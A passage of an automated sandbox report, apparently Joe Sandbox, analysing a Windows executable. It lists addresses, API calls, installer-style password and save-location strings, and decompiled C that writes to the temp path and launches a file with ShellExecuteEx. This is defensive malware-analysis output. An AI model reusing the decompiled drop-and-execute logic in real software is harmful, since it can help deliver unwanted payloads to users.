                                                                                                                                                              0x0040144d
                                                                                                                                                              0x00401452
                                                                                                                                                              0x00401457
                                                                                                                                                              0x0040145c
                                                                                                                                                              0x0040148e
                                                                                                                                                              0x00401493
                                                                                                                                                              0x00401495
                                                                                                                                                              0x00401497
                                                                                                                                                              0x0040149c
                                                                                                                                                              0x004014a1
                                                                                                                                                              0x004014a6
                                                                                                                                                              0x004014ab
                                                                                                                                                              0x004014b0
                                                                                                                                                              0x004014b0
                                                                                                                                                              0x004014c0
                                                                                                                                                              0x004014c5
                                                                                                                                                              0x004014c7
                                                                                                                                                              0x004014c9
                                                                                                                                                              0x004014ce
                                                                                                                                                              0x004014d3
                                                                                                                                                              0x004014d8
                                                                                                                                                              0x004014dd
                                                                                                                                                              0x004014e2
                                                                                                                                                              0x004014e2
                                                                                                                                                              0x004014f2
                                                                                                                                                              0x004014f7
                                                                                                                                                              0x004014f9
                                                                                                                                                              0x00401756
                                                                                                                                                              0x00401756
                                                                                                                                                              0x0040175b
                                                                                                                                                              0x00401769
                                                                                                                                                              0x00401774
                                                                                                                                                              0x00401775
                                                                                                                                                              0x0040177a
                                                                                                                                                              0x0040177f
                                                                                                                                                              0x0040178d
                                                                                                                                                              0x00401798
                                                                                                                                                              0x00401799
                                                                                                                                                              0x004017a9
                                                                                                                                                              0x004017ae
                                                                                                                                                              0x004017b0
                                                                                                                                                              0x00401a25
                                                                                                                                                              0x00401a25
                                                                                                                                                              0x00401a2b
                                                                                                                                                              0x00401a31
                                                                                                                                                              0x00401a3b
                                                                                                                                                              0x00401a40
                                                                                                                                                              0x00401a46
                                                                                                                                                              0x00401a4b
                                                                                                                                                              0x00401a51
                                                                                                                                                              0x00401a52
                                                                                                                                                              0x00401a57
                                                                                                                                                              0x00401a62
                                                                                                                                                              0x00401a67
                                                                                                                                                              0x00401a69
                                                                                                                                                              0x00401a8d
                                                                                                                                                              0x00401a92
                                                                                                                                                              0x00401a97
                                                                                                                                                              0x00401aa8
                                                                                                                                                              0x00401aad
                                                                                                                                                              0x00401ab3
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401a6b
                                                                                                                                                              0x00401a76
                                                                                                                                                              0x00401a80
                                                                                                                                                              0x00401ac5
                                                                                                                                                              0x00401acb
                                                                                                                                                              0x00401acb
                                                                                                                                                              0x00401acd
                                                                                                                                                              0x00401ad2
                                                                                                                                                              0x00401ad4
                                                                                                                                                              0x00401ada
                                                                                                                                                              0x00401ada
                                                                                                                                                              0x00401adf
                                                                                                                                                              0x00401ae5
                                                                                                                                                              0x00401aeb
                                                                                                                                                              0x00401af1
                                                                                                                                                              0x00401af6
                                                                                                                                                              0x00401afc
                                                                                                                                                              0x00401b01
                                                                                                                                                              0x00401b07
                                                                                                                                                              0x00401b0d
                                                                                                                                                              0x00401b13
                                                                                                                                                              0x00401b19
                                                                                                                                                              0x00401b1d
                                                                                                                                                              0x00401b22
                                                                                                                                                              0x00401b28
                                                                                                                                                              0x00401b33
                                                                                                                                                              0x00401b3d
                                                                                                                                                              0x00401b3f
                                                                                                                                                              0x00401b4c
                                                                                                                                                              0x00401b51
                                                                                                                                                              0x00401b57
                                                                                                                                                              0x00401b5d
                                                                                                                                                              0x00401b60
                                                                                                                                                              0x00401b65
                                                                                                                                                              0x00401b6b
                                                                                                                                                              0x00401b71
                                                                                                                                                              0x00401b74
                                                                                                                                                              0x00401b79
                                                                                                                                                              0x00401b7f
                                                                                                                                                              0x00401b85
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x004017b6
                                                                                                                                                              0x004017b6
                                                                                                                                                              0x004017bb
                                                                                                                                                              0x004017c2
                                                                                                                                                              0x004017c7
                                                                                                                                                              0x004017cd
                                                                                                                                                              0x004017e0
                                                                                                                                                              0x004017e5
                                                                                                                                                              0x004017e6
                                                                                                                                                              0x004017e7
                                                                                                                                                              0x004017ed
                                                                                                                                                              0x004017f3
                                                                                                                                                              0x004017f9
                                                                                                                                                              0x004017fe
                                                                                                                                                              0x00401812
                                                                                                                                                              0x00401812
                                                                                                                                                              0x00401812
                                                                                                                                                              0x00401800
                                                                                                                                                              0x00401800
                                                                                                                                                              0x00401806
                                                                                                                                                              0x00401809
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040180b
                                                                                                                                                              0x0040180b
                                                                                                                                                              0x0040180b
                                                                                                                                                              0x00401809
                                                                                                                                                              0x00401814
                                                                                                                                                              0x00401816
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040181c
                                                                                                                                                              0x0040181c
                                                                                                                                                              0x00401823
                                                                                                                                                              0x0040182a
                                                                                                                                                              0x0040182f
                                                                                                                                                              0x0040183b
                                                                                                                                                              0x00401841
                                                                                                                                                              0x00401845
                                                                                                                                                              0x00401850
                                                                                                                                                              0x00401851
                                                                                                                                                              0x00401856
                                                                                                                                                              0x0040185c
                                                                                                                                                              0x0040185c
                                                                                                                                                              0x0040185e
                                                                                                                                                              0x00401863
                                                                                                                                                              0x004019c6
                                                                                                                                                              0x004019c6
                                                                                                                                                              0x004019cd
                                                                                                                                                              0x004019da
                                                                                                                                                              0x004019df
                                                                                                                                                              0x004019e5
                                                                                                                                                              0x004019eb
                                                                                                                                                              0x004019ee
                                                                                                                                                              0x004019f3
                                                                                                                                                              0x004019f9
                                                                                                                                                              0x004019ff
                                                                                                                                                              0x00401a02
                                                                                                                                                              0x00401a07
                                                                                                                                                              0x00401a0d
                                                                                                                                                              0x00401a13
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401869
                                                                                                                                                              0x00401869
                                                                                                                                                              0x0040186f
                                                                                                                                                              0x00401875
                                                                                                                                                              0x00401880
                                                                                                                                                              0x00401881
                                                                                                                                                              0x00401886
                                                                                                                                                              0x0040188c
                                                                                                                                                              0x0040188c
                                                                                                                                                              0x0040188e
                                                                                                                                                              0x00401893
                                                                                                                                                              0x00401895
                                                                                                                                                              0x0040189b
                                                                                                                                                              0x0040189b
                                                                                                                                                              0x004018b0
                                                                                                                                                              0x004018b2
                                                                                                                                                              0x00401998
                                                                                                                                                              0x00401998
                                                                                                                                                              0x004019a8
                                                                                                                                                              0x004019aa
                                                                                                                                                              0x004019b7
                                                                                                                                                              0x004019c1
                                                                                                                                                              0x004019c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004018b8
                                                                                                                                                              0x004018bd
                                                                                                                                                              0x004018c2
                                                                                                                                                              0x004018cd
                                                                                                                                                              0x004018d9
                                                                                                                                                              0x004018e3
                                                                                                                                                              0x004018e8
                                                                                                                                                              0x004018ee
                                                                                                                                                              0x004018f8
                                                                                                                                                              0x004018fd
                                                                                                                                                              0x00401903
                                                                                                                                                              0x00401908
                                                                                                                                                              0x00401914
                                                                                                                                                              0x0040191a
                                                                                                                                                              0x0040191e
                                                                                                                                                              0x00401923
                                                                                                                                                              0x00401929
                                                                                                                                                              0x0040192e
                                                                                                                                                              0x00401934
                                                                                                                                                              0x00401937
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401939
                                                                                                                                                              0x00401939
                                                                                                                                                              0x00401940
                                                                                                                                                              0x0040194d
                                                                                                                                                              0x00401952
                                                                                                                                                              0x00401958
                                                                                                                                                              0x0040195e
                                                                                                                                                              0x00401961
                                                                                                                                                              0x00401966
                                                                                                                                                              0x0040196c
                                                                                                                                                              0x00401972
                                                                                                                                                              0x00401975
                                                                                                                                                              0x0040197a
                                                                                                                                                              0x00401980
                                                                                                                                                              0x00401986
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401937
                                                                                                                                                              0x004018b2
                                                                                                                                                              0x00401863
                                                                                                                                                              0x00401816
                                                                                                                                                              0x004014ff
                                                                                                                                                              0x00401523
                                                                                                                                                              0x00401547
                                                                                                                                                              0x0040156f
                                                                                                                                                              0x00401592
                                                                                                                                                              0x004015a6
                                                                                                                                                              0x004015b0
                                                                                                                                                              0x004015b5
                                                                                                                                                              0x004015ba
                                                                                                                                                              0x004015c0
                                                                                                                                                              0x004015c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015e7
                                                                                                                                                              0x004015ea
                                                                                                                                                              0x00401630
                                                                                                                                                              0x00401633
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401635
                                                                                                                                                              0x0040163a
                                                                                                                                                              0x00401640
                                                                                                                                                              0x00401643
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401645
                                                                                                                                                              0x00401645
                                                                                                                                                              0x00401651
                                                                                                                                                              0x0040165c
                                                                                                                                                              0x0040165d
                                                                                                                                                              0x00401667
                                                                                                                                                              0x0040166c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040166c
                                                                                                                                                              0x00401643
                                                                                                                                                              0x004015ec
                                                                                                                                                              0x004015f1
                                                                                                                                                              0x004015f7
                                                                                                                                                              0x004015fa
                                                                                                                                                              0x00401672
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015fc
                                                                                                                                                              0x004015fc
                                                                                                                                                              0x00401608
                                                                                                                                                              0x00401613
                                                                                                                                                              0x00401614
                                                                                                                                                              0x0040161e
                                                                                                                                                              0x00401623
                                                                                                                                                              0x00401678
                                                                                                                                                              0x00401678
                                                                                                                                                              0x0040167d
                                                                                                                                                              0x00401685
                                                                                                                                                              0x0040168b
                                                                                                                                                              0x00401691
                                                                                                                                                              0x00401696
                                                                                                                                                              0x0040169c
                                                                                                                                                              0x004016af
                                                                                                                                                              0x004016b4
                                                                                                                                                              0x004016b5
                                                                                                                                                              0x004016b6
                                                                                                                                                              0x004016bc
                                                                                                                                                              0x004016c2
                                                                                                                                                              0x004016c8
                                                                                                                                                              0x004016cd
                                                                                                                                                              0x00401708
                                                                                                                                                              0x0040170d
                                                                                                                                                              0x0040170f
                                                                                                                                                              0x00401711
                                                                                                                                                              0x00401716
                                                                                                                                                              0x00401716
                                                                                                                                                              0x0040171b
                                                                                                                                                              0x00401721
                                                                                                                                                              0x00401727
                                                                                                                                                              0x0040172d
                                                                                                                                                              0x00401733
                                                                                                                                                              0x00401739
                                                                                                                                                              0x0040173f
                                                                                                                                                              0x00401745
                                                                                                                                                              0x0040174b
                                                                                                                                                              0x00401751
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004016cf
                                                                                                                                                              0x004016cf
                                                                                                                                                              0x004016e0
                                                                                                                                                              0x004016e5
                                                                                                                                                              0x004016eb
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x004016cd
                                                                                                                                                              0x004015fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004015ea
                                                                                                                                                              0x004015c5
                                                                                                                                                              0x004015cb
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x004014f9
                                                                                                                                                              0x00401441
                                                                                                                                                              0x004013e7
                                                                                                                                                              0x004012db
                                                                                                                                                              0x004012db
                                                                                                                                                              0x004012ec
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401baf
                                                                                                                                                              0x00401bb4
                                                                                                                                                              0x00401bb9
                                                                                                                                                              0x00401bc3
                                                                                                                                                              0x00401bc8
                                                                                                                                                              0x00401bcd
                                                                                                                                                              0x00401bdc

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040100F
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                                                                                                                • Part of subcall function 00407470: HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                                                                                                                                                • Part of subcall function 00407470: RtlAllocateHeap.NTDLL(02260000,00000001,00004104), ref: 004074AA
                                                                                                                                                                • Part of subcall function 00406807: HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                                                                                                                                                • Part of subcall function 00404AB3: LoadIconA.USER32(00000001,00000058), ref: 00404AE1
                                                                                                                                                                • Part of subcall function 00404AB3: LoadCursorA.USER32(00000000,00007F00), ref: 00404AF3
                                                                                                                                                                • Part of subcall function 004040E0: RtlInitializeCriticalSection.NTDLL(0040B40C), ref: 004040EA
                                                                                                                                                                • Part of subcall function 004040E0: GetStockObject.GDI32(00000011), ref: 004040F2
                                                                                                                                                                • Part of subcall function 004040E0: memset.MSVCRT ref: 0040412E
                                                                                                                                                                • Part of subcall function 00403D90: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                                                                                                                                                • Part of subcall function 0040393B: RtlInitializeCriticalSection.NTDLL(0040B3B8), ref: 00403950
                                                                                                                                                                • Part of subcall function 00403694: 7048DB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                                                                                                                                                • Part of subcall function 00403694: CoInitialize.OLE32(00000000), ref: 0040369B
                                                                                                                                                                • Part of subcall function 00403EF0: RtlAllocateHeap.NTDLL(00000000,0000002C), ref: 00403EFD
                                                                                                                                                                • Part of subcall function 00403060: HeapFree.KERNEL32(00000000,021412B8,00000000,004010A6,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 00403091
                                                                                                                                                                • Part of subcall function 004030A0: RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                                                                                                                                                • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(00470000,00000008,00000000), ref: 00403DD1
                                                                                                                                                              • GetUserDefaultLangID.KERNEL32(00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010CF
                                                                                                                                                              • VerLanguageNameA.KERNEL32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010D5
                                                                                                                                                              • CharLowerA.USER32(00000000,00000008,00000400,00000008,0040A380,0040B1AC,00000007,00000008,00000000,0040A388,00000007,00000000,00001000,00000000,00000000), ref: 004010E0
                                                                                                                                                                • Part of subcall function 00403E30: HeapFree.KERNEL32(00470000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 00401311
                                                                                                                                                                • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                                                                                                                                                • Part of subcall function 00403A18: strncpy.MSVCRT ref: 00403A53
                                                                                                                                                                • Part of subcall function 004036A2: MessageBoxA.USER32(00000000,00000010,00000000,?), ref: 004036BC
                                                                                                                                                              • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                                                                                                                                              • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                                                                                                                                              • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                                                                                                                                              Strings
                                                                                                                                                              • Choose a location to save the files., xrefs: 0040129F
                                                                                                                                                              • The file , xrefs: 0040125F
                                                                                                                                                              • Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet., xrefs: 004011AA
                                                                                                                                                              • deutsch, xrefs: 00401119
                                                                                                                                                              • Can not create some of your include files., xrefs: 0040121F
                                                                                                                                                              • An unknown error occured. The program will be terminated., xrefs: 0040127F
                                                                                                                                                              • Continue?, xrefs: 004011FF
                                                                                                                                                              • Error!, xrefs: 0040120F
                                                                                                                                                              • This program is not supported on this operating system., xrefs: 0040128F
                                                                                                                                                              • Fehler!, xrefs: 0040113A
                                                                                                                                                              • Bitte whlen Sie einen Ordner zum Speichern der Dateien aus., xrefs: 004011CA
                                                                                                                                                              • Fortfahren?, xrefs: 0040112A
                                                                                                                                                              • Passwort, xrefs: 004011DA
                                                                                                                                                              • Die Datei , xrefs: 0040118A
                                                                                                                                                              • Overwrite?, xrefs: 0040124F
                                                                                                                                                              • Bitte geben Sie das Passwort ein., xrefs: 004011EA
                                                                                                                                                              • Please enter the password., xrefs: 004012BF
                                                                                                                                                              • Can not allocate the memory., xrefs: 0040122F
                                                                                                                                                              • 2, xrefs: 004012D6
                                                                                                                                                              • Falsches Passwort., xrefs: 0040116A
                                                                                                                                                              • Password, xrefs: 004012AF
                                                                                                                                                              • \BDFINOPS, xrefs: 00401A36
                                                                                                                                                              • Einige Include Dateien konnten nicht erstellt werden., xrefs: 0040114A
                                                                                                                                                              • Wrong password., xrefs: 0040123F
                                                                                                                                                              • already exists in the current directory. Overwrite?, xrefs: 0040126F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCreate$Initialize$CriticalExitFreeHandleLoadModuleProcessSectionmemset$7048CharCursorDefaultDestroyIconLangLanguageLowerMessageNameObjectStockUserstrlenstrncpy
                                                                                                                                                              • String ID: already exists in the current directory. Overwrite?$2$An unknown error occured. The program will be terminated.$Bitte geben Sie das Passwort ein.$Bitte whlen Sie einen Ordner zum Speichern der Dateien aus.$Can not allocate the memory.$Can not create some of your include files.$Choose a location to save the files.$Continue?$Die Datei $Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.$Einige Include Dateien konnten nicht erstellt werden.$Error!$Falsches Passwort.$Fehler!$Fortfahren?$Overwrite?$Password$Passwort$Please enter the password.$The file $This program is not supported on this operating system.$Wrong password.$\BDFINOPS$deutsch
                                                                                                                                                              • API String ID: 3869613125-1834441879
                                                                                                                                                              • Opcode ID: 4d37f5d5bd3a94a3d3a44ba8fef24095b399bba2d0481d1ade3c53a40866be03
                                                                                                                                                              • Instruction ID: 2bde32f427d2b7eddb3ed1bd728a16dca1821eacaa3ecb70a8e4e83947eaff11
                                                                                                                                                              • Opcode Fuzzy Hash: 4d37f5d5bd3a94a3d3a44ba8fef24095b399bba2d0481d1ade3c53a40866be03
                                                                                                                                                              • Instruction Fuzzy Hash: 01423E71250204ABD700BF61EE62E2A3B65FB48349F50403BFA407E2F6DB7959119B9E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00405EB2(void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				CHAR* _t3;
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				_Unknown_base(*)()* _t7;
                                                                                                                                                              				long _t9;
                                                                                                                                                              				long _t10;
                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                              				struct HINSTANCE__* _t14;
                                                                                                                                                              
                                                                                                                                                              				_t3 = E00407750(0x104, _a4); // executed
                                                                                                                                                              				_t11 = _t3;
                                                                                                                                                              				_t10 = GetTempPathA(0x104, _t11);
                                                                                                                                                              				_t14 = LoadLibraryA("Kernel32.DLL");
                                                                                                                                                              				if(_t14 != 0) {
                                                                                                                                                              					_t7 = GetProcAddress(_t14, "GetLongPathNameA");
                                                                                                                                                              					if(_t7 != 0) {
                                                                                                                                                              						_t9 =  *_t7(_t11, _t11, 0x104); // executed
                                                                                                                                                              						_t10 = _t9;
                                                                                                                                                              					}
                                                                                                                                                              					FreeLibrary(_t14);
                                                                                                                                                              				}
                                                                                                                                                              				_t6 = E004077F0(0x104 - _t10);
                                                                                                                                                              				_t11[_t10] = 0;
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}










                                                                                                                                                              0x00405ec0
                                                                                                                                                              0x00405ec5
                                                                                                                                                              0x00405ed4
                                                                                                                                                              0x00405edc
                                                                                                                                                              0x00405ee0
                                                                                                                                                              0x00405ee8
                                                                                                                                                              0x00405ef0
                                                                                                                                                              0x00405ef5
                                                                                                                                                              0x00405ef7
                                                                                                                                                              0x00405ef7
                                                                                                                                                              0x00405efa
                                                                                                                                                              0x00405efa
                                                                                                                                                              0x00405f03
                                                                                                                                                              0x00405f08
                                                                                                                                                              0x00405f10

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(02260000,00000001,022606F0,000040FF), ref: 00407797
                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                                                                                                                                              • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                                                                                                                                              • String ID: GetLongPathNameA$Kernel32.DLL
                                                                                                                                                              • API String ID: 752937943-822094646
                                                                                                                                                              • Opcode ID: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                                                                                                                                              • Instruction ID: 3562a466a888384f8ba7b5ae80b98f608e44e67bd8cf52f83c325266dc9a6611
                                                                                                                                                              • Opcode Fuzzy Hash: f2ba6410edf8bde28fa5554e8a9c22902d5f8ca1b7105de9d70a6170c437be0b
                                                                                                                                                              • Instruction Fuzzy Hash: 5CF0B4722012142BC32127755D4CF6F3A6CCB82751B04003AF944B2142CE7D5D1082BE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 344 402761-402763 345 402768-402773 344->345 345->345 346 402775-4027de call 403100 * 3 ShellExecuteEx 345->346 353 4027e2-4027ff Sleep GetExitCodeProcess 346->353 354 402801-40280b 353->354 355 40280f 353->355 354->355 356 40280d-402839 call 407550 * 3 354->356 355->353
                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E00402761() {
                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                              				int _t34;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                              				intOrPtr* _t50;
                                                                                                                                                              
                                                                                                                                                              				_t44 = 0x14;
                                                                                                                                                              				do {
                                                                                                                                                              					_t50 = _t50 - 4;
                                                                                                                                                              					 *_t50 = 0;
                                                                                                                                                              					_t44 = _t44 - 1;
                                                                                                                                                              				} while (_t44 != 0);
                                                                                                                                                              				E00403100(_t50,  *((intOrPtr*)(_t50 + 0x5c)));
                                                                                                                                                              				E00403100(_t50 + 4,  *((intOrPtr*)(_t50 + 0x60)));
                                                                                                                                                              				E00403100(_t50 + 8,  *((intOrPtr*)(_t50 + 0x64)));
                                                                                                                                                              				_t48 = _t50 + 0xc;
                                                                                                                                                              				 *_t48 = 0x3c;
                                                                                                                                                              				 *((intOrPtr*)(_t48 + 4)) = 0x140;
                                                                                                                                                              				 *((intOrPtr*)(_t48 + 0x1c)) = 0;
                                                                                                                                                              				 *(_t48 + 0xc) = "open";
                                                                                                                                                              				 *((intOrPtr*)(_t48 + 0x10)) =  *_t50;
                                                                                                                                                              				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t50 + 8));
                                                                                                                                                              				 *((intOrPtr*)(_t48 + 0x18)) =  *((intOrPtr*)(_t50 + 4));
                                                                                                                                                              				_t32 = _t50 + 0xc;
                                                                                                                                                              				_push(_t32); // executed
                                                                                                                                                              				L0040800B(); // executed
                                                                                                                                                              				 *((intOrPtr*)(_t50 + 0x48)) = _t32;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					Sleep(0x19); // executed
                                                                                                                                                              					_t34 = GetExitCodeProcess( *(_t50 + 0x48), _t50 + 0x4c); // executed
                                                                                                                                                              					if(_t34 != 0 &&  *(_t50 + 0x4c) != 0x103) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return E00407550(E00407550(E00407550(1,  *_t50),  *((intOrPtr*)(_t50 + 4))),  *((intOrPtr*)(_t50 + 8)));
                                                                                                                                                              			}








                                                                                                                                                              0x00402763
                                                                                                                                                              0x00402768
                                                                                                                                                              0x00402768
                                                                                                                                                              0x0040276b
                                                                                                                                                              0x00402772
                                                                                                                                                              0x00402772
                                                                                                                                                              0x0040277c
                                                                                                                                                              0x00402789
                                                                                                                                                              0x00402796
                                                                                                                                                              0x0040279f
                                                                                                                                                              0x004027a3
                                                                                                                                                              0x004027aa
                                                                                                                                                              0x004027b1
                                                                                                                                                              0x004027bd
                                                                                                                                                              0x004027c3
                                                                                                                                                              0x004027ca
                                                                                                                                                              0x004027d1
                                                                                                                                                              0x004027d4
                                                                                                                                                              0x004027d8
                                                                                                                                                              0x004027d9
                                                                                                                                                              0x004027de
                                                                                                                                                              0x004027e2
                                                                                                                                                              0x004027e7
                                                                                                                                                              0x004027f8
                                                                                                                                                              0x004027ff
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040280f
                                                                                                                                                              0x00402839

                                                                                                                                                              APIs
                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 004027D9
                                                                                                                                                              • Sleep.KERNEL32(00000019), ref: 004027E7
                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 004027F8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CodeExecuteExitProcessShellSleep
                                                                                                                                                              • String ID: open
                                                                                                                                                              • API String ID: 3887608683-2758837156
                                                                                                                                                              • Opcode ID: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                                                                                                                                              • Instruction ID: 26639f79705cc0b5153d4f828301450fc79178279bf791e28a5e3737258c8c49
                                                                                                                                                              • Opcode Fuzzy Hash: 52a67e558ad29990cc8f225169e9bbe56d7f2f31611fe38e94e8209ad79b84ad
                                                                                                                                                              • Instruction Fuzzy Hash: 41216A71008209AFC700EF15C845A9FBBE8FB84304F00883EF598662D0D779EA15CB56
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 371 406330-406343 372 406365-40636e 371->372 373 406345-406362 SetFilePointer 371->373 374 406370-40637d 372->374 375 4063de-4063df call 405f90 372->375 373->372 376 4063cb-4063db 374->376 377 40637f-406382 374->377 381 4063e4-4063e9 375->381 379 406384-406387 377->379 380 4063b6-4063c8 377->380 382 4063a3-4063b3 379->382 383 406389-4063a0 memcpy 379->383 384 40640b-40642a memcpy 381->384 385 4063eb-406408 WriteFile 381->385
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406330(void** _a4, void* _a8, int _a12) {
                                                                                                                                                              				long _v4;
